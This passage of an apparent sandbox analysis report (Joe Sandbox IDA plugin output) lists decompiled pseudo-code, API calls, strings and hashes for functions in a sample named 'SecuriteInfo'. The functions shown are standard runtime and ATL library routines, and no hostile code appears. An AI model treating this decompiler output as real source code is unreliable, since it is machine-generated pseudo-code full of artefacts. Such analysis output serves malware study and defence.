                      					_t21 = _t21 + 0x18;
                      					if(_t12 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				return E009D1520(E009D1520(IsWindowVisible( *_v8), _t21 - _t21), _t20 - _t21 + 4);
                      			}








                      APIs
                      Strings
                      • %ls, xrefs: 0095468D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00954699
                      • ::IsWindow(m_hWnd), xrefs: 00954688
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Window$Visible
                      • String ID: %ls$::IsWindow(m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h
                      • API String ID: 3657826678-3692021841
                      • Opcode ID: 3b22ef87c556f916ca3880c8419a167cb92bb9cc55cfffadd1c01481f1311527
                      • Instruction ID: 305040e2db7d5c2d3f0b00a9294fd801fd402b9a2c58c6165cdd9451e8833116
                      • Opcode Fuzzy Hash: 3b22ef87c556f916ca3880c8419a167cb92bb9cc55cfffadd1c01481f1311527
                      • Instruction Fuzzy Hash: 03F0F632E95318BBC720E79CEC43F5E73689F85705F100295F909A3341E965DD4047D6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0096B220(void* __ecx, WCHAR* _a4) {
                      				struct HINSTANCE__* _v8;
                      
                      				_v8 = LoadLibraryExW(_a4, 0, 0x800);
                      				if(_v8 == 0) {
                      					if(GetLastError() != 0x57 || E009A2BC0(_a4, L"api-ms-", 7) == 0) {
                      						return 0;
                      					} else {
                      						return LoadLibraryExW(_a4, 0, 0);
                      					}
                      				}
                      				return _v8;
                      			}




                      APIs
                      • LoadLibraryExW.KERNEL32(0096B127,00000000,00000800,?,?,0096B127,00000000), ref: 0096B22F
                      • GetLastError.KERNEL32(?,?,0096B127), ref: 0096B243
                      • _wcsncmp.LIBCMTD ref: 0096B259
                      • LoadLibraryExW.KERNEL32(0096B127,00000000,00000000,?,0096B127), ref: 0096B26D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: LibraryLoad$ErrorLast_wcsncmp
                      • String ID: api-ms-
                      • API String ID: 4169583555-2084034818
                      • Opcode ID: 1d0e0b704105e932ab65fee4b56e2a3dbb24afc3a37d42c06aeb74d2f91592ef
                      • Instruction ID: 0d4ba8ef713343e3b472f1d42c9664763baaf3f06fc04cae5f6d637fbd2980a9
                      • Opcode Fuzzy Hash: 1d0e0b704105e932ab65fee4b56e2a3dbb24afc3a37d42c06aeb74d2f91592ef
                      • Instruction Fuzzy Hash: 67F0E231A88204FBDB109BA0CC1ABAD37B8EB14700F204424FA04EA180FB71EE809790
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E009637C0(intOrPtr _a4) {
                      				signed int _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				char _v24;
                      				signed int _v28;
                      				char _v32;
                      				char* _v36;
                      				char _v40;
                      				char* _v44;
                      				char _v48;
                      				char* _v52;
                      				char _v56;
                      				char* _v60;
                      				char _v64;
                      				char* _v68;
                      				char _v72;
                      				char* _v76;
                      				char _v80;
                      				char* _v84;
                      				char _v88;
                      				char* _v92;
                      				char _v96;
                      				intOrPtr _v100;
                      				char _v104;
                      				intOrPtr _v108;
                      				char _v112;
                      				char* _t64;
                      				intOrPtr _t82;
                      				char* _t89;
                      				signed int _t92;
                      
                      				_t64 =  *0xb30640; // 0x0
                      				if( *_t64 == 0) {
                      					E0095F350(_a4, 1);
                      					return _a4;
                      				}
                      				_t89 =  *0xb30640; // 0x0
                      				_v16 =  *_t89 - 0x41;
                      				_t82 =  *0xb30640; // 0x0
                      				 *0xb30640 = _t82 + 1;
                      				_v8 = _v16;
                      				if(_v8 > 0x16) {
                      					E0095F350(_a4, 2);
                      					return _a4;
                      				}
                      				E0095F350( &_v24, 2);
                      				if(E00962230( &_v24) == 0) {
                      					L16:
                      					E0095F240(_a4,  &_v24);
                      					return _a4;
                      				}
                      				_v12 = _v8 & 0xfffffffe;
                      				if(_v12 > 0x16) {
                      					goto L16;
                      				}
                      				_t10 = _v12 + 0x963a00; // 0xcccccc0a
                      				_t92 =  *_t10 & 0x000000ff;
                      				switch( *((intOrPtr*)(_t92 * 4 +  &M009639D0))) {
                      					case 0:
                      						_v32 = E00960130(_t87, 1);
                      						_v28 = _t92;
                      						E0095F7E0( &_v24,  &_v32);
                      						goto L16;
                      					case 1:
                      						_v40 = E00960130(__ecx, 2);
                      						_v36 = __edx;
                      						__ecx =  &_v40;
                      						__ecx =  &_v24;
                      						__eax = E0095F7E0(__ecx,  &_v40);
                      						goto L16;
                      					case 2:
                      						_v48 = E00960130(__ecx, 4);
                      						_v44 = __edx;
                      						__edx =  &_v48;
                      						__ecx =  &_v24;
                      						__eax = E0095F7E0(__ecx,  &_v48);
                      						goto L16;
                      					case 3:
                      						_v56 = E00960130(__ecx, 3);
                      						_v52 = __edx;
                      						__eax =  &_v56;
                      						__ecx =  &_v24;
                      						__eax = E0095F7E0(__ecx,  &_v56);
                      						goto L16;
                      					case 4:
                      						_v64 = E00960130(__ecx, 5);
                      						_v60 = __edx;
                      						__ecx =  &_v64;
                      						__ecx =  &_v24;
                      						__eax = E0095F7E0(__ecx,  &_v64);
                      						goto L16;
                      					case 5:
                      						_v80 = E00960130(__ecx, 7);
                      						_v76 = __edx;
                      						__eax =  &_v80;
                      						__ecx =  &_v24;
                      						__eax = E0095F7E0(__ecx,  &_v80);
                      						goto L16;
                      					case 6:
                      						_v88 = E00960130(__ecx, 8);
                      						_v84 = __edx;
                      						__ecx =  &_v88;
                      						__ecx =  &_v24;
                      						__eax = E0095F7E0(__ecx,  &_v88);
                      						goto L16;
                      					case 7:
                      						_v72 = E00960130(__ecx, 6);
                      						_v68 = __edx;
                      						__edx =  &_v72;
                      						__ecx =  &_v24;
                      						__eax = E0095F7E0(__ecx,  &_v72);
                      						goto L16;
                      					case 8:
                      						_v96 = E00960130(__ecx, 9);
                      						_v92 = __edx;
                      						__edx =  &_v96;
                      						__ecx =  &_v24;
                      						__eax = E0095F7E0(__ecx,  &_v96);
                      						goto L16;
                      					case 9:
                      						_v104 = E00960130(__ecx, 0xa);
                      						_v100 = __edx;
                      						__eax =  &_v104;
                      						__ecx =  &_v24;
                      						__eax = E0095F7E0(__ecx,  &_v104);
                      						goto L16;
                      					case 0xa:
                      						_v112 = E00960130(__ecx, 0xb);
                      						_v108 = __edx;
                      						__ecx =  &_v112;
                      						__ecx =  &_v24;
                      						__eax = E0095F7E0(__ecx,  &_v112);
                      						goto L16;
                      					case 0xb:
                      						goto L16;
                      				}
                      			}

































                      APIs
                      • UnDecorator::doMSKeywords.LIBCMTD ref: 0096380E
                      • Mailbox.LIBCMTD ref: 009639A0
                      • DName::DName.LIBVCRUNTIMED ref: 00963809
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      • DName::DName.LIBVCRUNTIMED ref: 009639B1
                      • DName::DName.LIBVCRUNTIMED ref: 009639C2
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name$Name::$Decorator::doKeywordsMailboxNode::makeStatus
                      • String ID:
                      • API String ID: 2417761376-0
                      • Opcode ID: b6f0463b656c11f35c1b0f535d629a3828c40dfd5e5ae1d3f03c2d5b67b95dbe
                      • Instruction ID: fc7c518122a8d7d0c1b93fdf4d8fef222f3ce679c628fa9c82eed2bdf1503eea
                      • Opcode Fuzzy Hash: b6f0463b656c11f35c1b0f535d629a3828c40dfd5e5ae1d3f03c2d5b67b95dbe
                      • Instruction Fuzzy Hash: 6F51F3F5D04208DFDB09EFE4D952AEE7BB4AF94301F14812AE51A6B281EA745B04CF52
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E009699E0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
                      				signed char _v5;
                      				char _v6;
                      				void* _v12;
                      				char* _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				char _v32;
                      				char _v40;
                      				char _v48;
                      				char* _t97;
                      				intOrPtr _t98;
                      
                      				_v24 = __ecx;
                      				E0095F3F0( &_v32);
                      				E0096A860(__ebx, __edi, __esi,  &_v40);
                      				if(E0096AB70( &_v40) != 3) {
                      					if(E0096AB70( &_v40) == 2) {
                      						L5:
                      						_v5 = 0;
                      						_push(_v5 & 0x000000ff);
                      						_t98 =  *0xb30644; // 0x0
                      						E0095F820( &_v32, E0095E5F0( &_v48, _t98));
                      						L7:
                      						if(_a4 == 0) {
                      							_a8 = E0096A700( &_v32) + 1;
                      							_v20 = E0095F7A0(_a8, 0xb3065c, 1);
                      							_a4 = _v20;
                      						}
                      						if(_a4 == 0) {
                      							L20:
                      							return _a4;
                      						} else {
                      							E00967D80( &_v32, _a4, _a8);
                      							_v12 = _a4;
                      							_v16 = _v12;
                      							while( *_v12 != 0) {
                      								if( *_v12 != 0x20) {
                      									_v6 =  *_v12;
                      									_v12 = _v12 + 1;
                      									 *_v16 = _v6;
                      									_v16 = _v16 + 1;
                      									L18:
                      									continue;
                      								}
                      								_v12 = _v12 + 1;
                      								 *_v16 = 0x20;
                      								_v16 = _v16 + 1;
                      								while( *_v12 == 0x20) {
                      									_v12 = _v12 + 1;
                      								}
                      								goto L18;
                      							}
                      							 *_v16 =  *_v12;
                      							goto L20;
                      						}
                      					}
                      					if(E00962290() != 0) {
                      						L6:
                      						E0095F820( &_v32,  &_v40);
                      						goto L7;
                      					}
                      					_t97 =  *0xb30640; // 0x0
                      					if( *_t97 == 0) {
                      						goto L6;
                      					}
                      					goto L5;
                      				}
                      				return 0;
                      			}














                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 009699EC
                        • Part of subcall function 0096A860: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0096A869
                        • Part of subcall function 0096A860: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 0096A8C6
                        • Part of subcall function 0096A860: operator+.LIBVCRUNTIMED ref: 0096A8D7
                        • Part of subcall function 0096A860: Mailbox.LIBCMTD ref: 0096A8E3
                        • Part of subcall function 0096A860: Mailbox.LIBCMTD ref: 0096A9D5
                      • Mailbox.LIBCMTD ref: 00969A53
                      • DName::length.LIBVCRUNTIMED ref: 00969A6F
                      • DName::getString.LIBCMTD ref: 00969AAB
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Mailbox$Iterator_baseIterator_base::_std::_$DecoratedDecorator::getNameName::getName::lengthStringoperator+
                      • String ID:
                      • API String ID: 245642696-0
                      • Opcode ID: 385f6daaa90a5fafe8858fbd74156b41f0edc0f9481c66441a6561cdf517e806
                      • Instruction ID: 92c76752b5efdf449c2958d74eb18c53bd413e97174732df870e8902d3597abe
                      • Opcode Fuzzy Hash: 385f6daaa90a5fafe8858fbd74156b41f0edc0f9481c66441a6561cdf517e806
                      • Instruction Fuzzy Hash: 9F418D71D04248AFCF08DFE4D4A1AEEBBB9EF95304F248099E856A7341D635AB45CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 72%
                      			E00941AC0(void* __ecx, void* __esi, short* _a4, char* _a8, int _a12, int _a16) {
                      				intOrPtr _v8;
                      				short* _t14;
                      				int _t18;
                      				void* _t20;
                      				void* _t21;
                      				void* _t22;
                      				void* _t32;
                      				void* _t33;
                      
                      				_v8 = 0xcccccccc;
                      				_t35 = _a8;
                      				if(_a8 == 0) {
                      					_t22 = L00994930(_t35, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x234, 0, "%ls", L"lpa != 0");
                      					_t33 = _t33 + 0x18;
                      					if(_t22 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				_t37 = _a4;
                      				if(_a4 == 0) {
                      					_t21 = L00994930(_t37, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x235, 0, "%ls", L"lpw != 0");
                      					_t33 = _t33 + 0x18;
                      					if(_t21 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_a4 == 0 || _a8 == 0) {
                      					_t14 = 0;
                      				} else {
                      					 *_a4 = 0;
                      					_t18 = MultiByteToWideChar(_a16, 0, _a8, 0xffffffff, _a4, _a12);
                      					__eflags = _t33 - _t33;
                      					_v8 = E009D1520(_t18, _t33 - _t33);
                      					__eflags = _v8;
                      					if(__eflags != 0) {
                      						_t14 = _a4;
                      					} else {
                      						__eflags = 0;
                      						if(0 == 0) {
                      							_t20 = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x23f, 0, "%ls", 0x9f40dc);
                      							_t33 = _t33 + 0x18;
                      							__eflags = _t20 - 1;
                      							if(__eflags == 0) {
                      								asm("int3");
                      							}
                      						}
                      						_t14 = 0;
                      					}
                      				}
                      				return E009D1520(_t14, _t32 - _t33 + 4);
                      			}











                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,?), ref: 00941B52
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlconv.h$lpa != 0$lpw != 0
                      • API String ID: 626452242-3592995100
                      • Opcode ID: 69684b50f9e0f5a3fcb9f0f36e55fa56e8149aeb271d1038240448048f894707
                      • Instruction ID: 372f21b215aa07a9a46e21b7ae8580f30b2dd0b4bcaa7b18a4c92fc132baf1e2
                      • Opcode Fuzzy Hash: 69684b50f9e0f5a3fcb9f0f36e55fa56e8149aeb271d1038240448048f894707
                      • Instruction Fuzzy Hash: 8821D431B9031CBBDB209B58EC07FBB3358DBA4B54F108515FA146A1C1F6B499D08B91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E009652B0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				char _v32;
                      				char _v40;
                      				char _v48;
                      				char _v56;
                      				void* _t34;
                      				void* _t46;
                      				void* _t47;
                      
                      				_t47 = __esi;
                      				_t46 = __edi;
                      				_t34 = __ebx;
                      				_v8 = E0095F7A0(8, 0xb3065c, 0);
                      				_t52 = _v8;
                      				if(_v8 == 0) {
                      					_v12 = 0;
                      				} else {
                      					_v12 = E0095F3F0(_v8);
                      				}
                      				_v16 = _v12;
                      				E00964380(_t34, _t46, _t47, _t52,  &_v32, _v16);
                      				_v20 = E00967D00( &_v40);
                      				_v24 = E0095FBB0(_v20,  &_v48, 0x20);
                      				E0095F820(_v16, E0095FB70(_v24,  &_v56, _a8));
                      				E0095F240(_a4,  &_v32);
                      				return _a4;
                      			}
















                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: MailboxName::operator+$Iterator_baseIterator_base::_std::_
                      • String ID:
                      • API String ID: 2657989147-0
                      • Opcode ID: 8c0d8c6db4faef42eff600e9c5dcca735c6e4c200a501d09949ebfee4ed07dd8
                      • Instruction ID: c7cc1a799f81ed66b5b0f2205ec5471411dba930f585d6940ed50c52e0dbfb64
                      • Opcode Fuzzy Hash: 8c0d8c6db4faef42eff600e9c5dcca735c6e4c200a501d09949ebfee4ed07dd8
                      • Instruction Fuzzy Hash: 711107B5D00108AFDB04EFD4D862FEEB7B8AF84311F108569F91567281D7706B04CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E009627C0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                      				char _v12;
                      				char _v20;
                      				char* _t13;
                      				intOrPtr _t22;
                      				char* _t33;
                      
                      				_t13 =  *0xb30640; // 0x0
                      				if( *_t13 != 0) {
                      					E009686C0(__ebx, __edi, __esi,  &_v12);
                      					E0095FDE0( &_v12, 0x5b);
                      					E0095FD40( &_v12, E009686C0(__ebx, __edi, __esi,  &_v20));
                      					E0095FDE0( &_v12, 0x5d);
                      					_t33 =  *0xb30640; // 0x0
                      					if( *_t33 != 0x40) {
                      						E0095F350(_a4, 2);
                      						return _a4;
                      					}
                      					_t22 =  *0xb30640; // 0x0
                      					 *0xb30640 = _t22 + 1;
                      					E0095F240(_a4,  &_v12);
                      					return _a4;
                      				}
                      				E0095F350(_a4, 1);
                      				return _a4;
                      			}









                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 009627D7
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      • DName::operator+=.LIBCMTD ref: 009627F2
                      • DName::operator+=.LIBCMTD ref: 00962811
                      • Mailbox.LIBCMTD ref: 00962838
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: NameName::operator+=$MailboxName::Node::makeStatus
                      • String ID:
                      • API String ID: 3118159130-0
                      • Opcode ID: cac4dd6d881a4a39305e26f7b689f23ae78d8fe5bd146cf80a56bba1408d4bac
                      • Instruction ID: 214f4897d29d68017cfc43ec19e8bb9df7a1064062494fc870ca2ff67186c760
                      • Opcode Fuzzy Hash: cac4dd6d881a4a39305e26f7b689f23ae78d8fe5bd146cf80a56bba1408d4bac
                      • Instruction Fuzzy Hash: 791192B0600508ABEB04EF50DCA6EBE3B74AF90355F404068FC0A5B1A6DF31BA44CB81
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 97%
                      			E0099C690(signed int __ecx, void* __edi) {
                      				char _v5;
                      				signed int _v12;
                      				signed int _v16;
                      				intOrPtr _v20;
                      				intOrPtr* _v24;
                      				signed int _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr* _v40;
                      				signed int _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				char _v56;
                      				intOrPtr _v60;
                      				char _v64;
                      				intOrPtr _v68;
                      				signed int _t83;
                      				intOrPtr _t90;
                      				signed int _t102;
                      				char _t105;
                      				void* _t112;
                      				void* _t116;
                      				void* _t169;
                      				void* _t170;
                      				void* _t173;
                      
                      				_t169 = __edi;
                      				_v12 = __ecx;
                      				_t83 = _v12;
                      				if( *((intOrPtr*)( *_t83)) != 0) {
                      					_v32 = E0099C490( *((intOrPtr*)( *((intOrPtr*)( *_v12)))));
                      					_v24 = E0099C490( *((intOrPtr*)( *((intOrPtr*)( *_v12)) + 4)));
                      					_t90 = E0099C490( *((intOrPtr*)( *((intOrPtr*)( *_v12)) + 8)));
                      					_t173 = _t170 + 0xc;
                      					_v36 = _t90;
                      					if(_v24 != _v36) {
                      						L18:
                      						 *_v24 = E0099C4C0( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                      						_v24 = _v24 + 4;
                      						 *((intOrPtr*)( *((intOrPtr*)( *_v12)))) = E0099C520(_v32);
                      						 *((intOrPtr*)( *((intOrPtr*)( *_v12)) + 4)) = E0099C520(_v24);
                      						 *((intOrPtr*)( *((intOrPtr*)( *_v12)) + 8)) = E0099C520(_v36);
                      						return 0;
                      					}
                      					_v28 = _v36 - _v32 >> 2;
                      					if(_v28 <= 0x200) {
                      						_v44 = _v28;
                      					} else {
                      						_v44 = 0x200;
                      					}
                      					_v48 = _v44;
                      					_t102 = _v28 + _v48;
                      					_v16 = _t102;
                      					if(_t102 == 0) {
                      						_v16 = 0x20;
                      					}
                      					_v20 = 0;
                      					_t135 = _v16;
                      					if(_v16 >= _v28) {
                      						_t116 = E009997D0(_t135, _t169, _v32, _v16, 4, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\startup\\onexit.cpp", 0x70);
                      						_t173 = _t173 + 0x18;
                      						_v52 = E0099C620( &_v56, _t116);
                      						_v20 = E0099CAD0(_v52);
                      						_t102 = E0099C640( &_v56);
                      					}
                      					if(_v20 == 0) {
                      						_v16 = _v28 + 4;
                      						_t112 = E009997D0(_v28 + 4, _t169, _v32, _v16, 4, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\startup\\onexit.cpp", 0x77);
                      						_t173 = _t173 + 0x18;
                      						_v60 = E0099C620( &_v64, _t112);
                      						_v20 = E0099CAD0(_v60);
                      						_t102 = E0099C640( &_v64);
                      					}
                      					if(_v20 != 0) {
                      						_v32 = _v20;
                      						_v24 = _v20 + _v28 * 4;
                      						_v36 = _v20 + _v16 * 4;
                      						_push(0);
                      						_t105 = E00999900(_v20 + _v16 * 4);
                      						_t173 = _t173 + 4;
                      						_v5 = _t105;
                      						_v68 = E0099C260( &_v5);
                      						_v40 = _v24;
                      						while(_v40 != _v36) {
                      							 *_v40 = _v68;
                      							_v40 = _v40 + 4;
                      						}
                      						goto L18;
                      					} else {
                      						return _t102 | 0xffffffff;
                      					}
                      				}
                      				return _t83 | 0xffffffff;
                      			}





























                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 0099C764
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 0099C7AD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: $minkernel\crts\ucrt\src\appcrt\startup\onexit.cpp
                      • API String ID: 4219598475-1215429239
                      • Opcode ID: c874602c67dceb562da4d449d4320f7efa2e51fe57a982830bb7d25a5dc6e57b
                      • Instruction ID: 2a0ca2b9b7e7aa3c13dd4f0631edea30c4325889f8eddeb6aa960ceb559decbc
                      • Opcode Fuzzy Hash: c874602c67dceb562da4d449d4320f7efa2e51fe57a982830bb7d25a5dc6e57b
                      • Instruction Fuzzy Hash: 4771E8B4E00209DFDF04DFA8D891AAEB7B1BF88314F208159E515BB351E735AA41CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 67%
                      			E0094F760(void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                      				intOrPtr _v8;
                      				signed int _v12;
                      				char _v20;
                      				signed int _v32;
                      				signed int _v36;
                      				void* _v40;
                      				signed int _v44;
                      				signed int _v48;
                      				signed int _v52;
                      				intOrPtr* _v56;
                      				void* __ebp;
                      				signed int _t62;
                      				void* _t67;
                      				void* _t74;
                      				signed char _t80;
                      				void* _t86;
                      				void* _t90;
                      				void* _t92;
                      				intOrPtr _t98;
                      				intOrPtr _t107;
                      				intOrPtr* _t117;
                      				intOrPtr* _t120;
                      				intOrPtr _t123;
                      				intOrPtr _t125;
                      				signed int _t134;
                      				void* _t135;
                      				void* _t136;
                      
                      				_t129 = __esi;
                      				_t127 = __edi;
                      				_t117 = __edx;
                      				_t93 = __ebx;
                      				_push(0xfffffffe);
                      				_push(0xa03390);
                      				_push(E00959CD0);
                      				_push( *[fs:0x0]);
                      				_t136 = _t135 + 0xffffffdc;
                      				_push(__ebx);
                      				_push(__esi);
                      				_push(__edi);
                      				_v56 = 0xcccccccc;
                      				_v52 = 0xcccccccc;
                      				_v48 = 0xcccccccc;
                      				_v44 = 0xcccccccc;
                      				_v40 = 0xcccccccc;
                      				_v36 = 0xcccccccc;
                      				_v32 = 0xcccccccc;
                      				_t62 =  *0xa0600c; // 0x5d529087
                      				_v12 = _v12 ^ _t62;
                      				_push(_t62 ^ _t134);
                      				 *[fs:0x0] =  &_v20;
                      				_v32 = 0x80004003;
                      				if(_a16 == 0) {
                      					L19:
                      					_push(_t117);
                      					_push(_v32);
                      					E009D14C0(_t134, 0x94f968);
                      					_pop(_t67);
                      					 *[fs:0x0] = _v20;
                      					return E009D1520(_t67, _t134 - _t136 + 0x34);
                      				} else {
                      					 *_a16 = 0;
                      					_t139 = _a8;
                      					if(_a8 != 0) {
                      						_t92 = L00994930(_t139, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlcom.h", 0xf6b, 0, "%ls", L"pUnkOuter == 0");
                      						_t136 = _t136 + 0x18;
                      						if(_t92 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					if(_a8 == 0) {
                      						_t120 = _a4;
                      						__eflags =  *(_t120 + 0x28);
                      						if( *(_t120 + 0x28) != 0) {
                      							L16:
                      							_t98 = _a4;
                      							__eflags =  *(_t98 + 0x28);
                      							if( *(_t98 + 0x28) != 0) {
                      								_t117 = _a4;
                      								_v32 =  *((intOrPtr*)(_t117 + 0x28));
                      							} else {
                      								_v56 = E0094EE90(_a4 + 0x2c);
                      								_t117 = _v56;
